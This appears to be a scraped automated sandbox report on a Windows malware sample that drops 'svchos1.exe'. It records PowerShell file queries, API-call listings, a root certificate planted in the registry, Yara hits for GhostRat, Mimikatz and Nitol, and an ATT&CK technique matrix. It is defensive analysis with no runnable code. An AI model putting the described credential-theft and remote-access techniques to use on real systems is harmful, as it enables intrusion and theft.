Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_00378698 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

28_2_00378698

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0384C690 strrchr,strrchr,strrchr,strncpy,GetUserNameA,_strcmpi,sprintf,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,strstr,strstr,strstr,lstrcat,lstrcat,lstrcat,lstrcpy,_strcmpi,_strcmpi,_strcmpi,_strcmpi,_strcmpi,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

28_2_0384C690

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0037EB80 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

28_2_0037EB80

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_00287D24

Source: C:\Users\user\Desktop\[System Process]12.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: svchos1.exe

Binary or memory string: 360Tray.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE

Yara detected Mimikatz

Source: Yara match	File source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.3893154946.00000000030EC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3894160136.00000000037DC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3894816354.000000000391B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3893793680.000000000322B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE

Yara detected Nitol

Source: Yara match	File source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03854150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,	28_2_03854150
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03853D90 socket,bind,getsockname,inet_addr,	28_2_03853D90
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03164150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,	33_2_03164150
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03163D90 socket,bind,getsockname,inet_addr,	33_2_03163D90

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	11 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	12 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	Login Hook	11 Windows Service	1 DLL Side-Loading	NTDS	1 System Service Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 Masquerading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	37 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Query Registry	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	361 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Indicator Removal	/etc/passwd and /etc/shadow	131 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	11 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report [System Process]12.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
[System Process]12.exe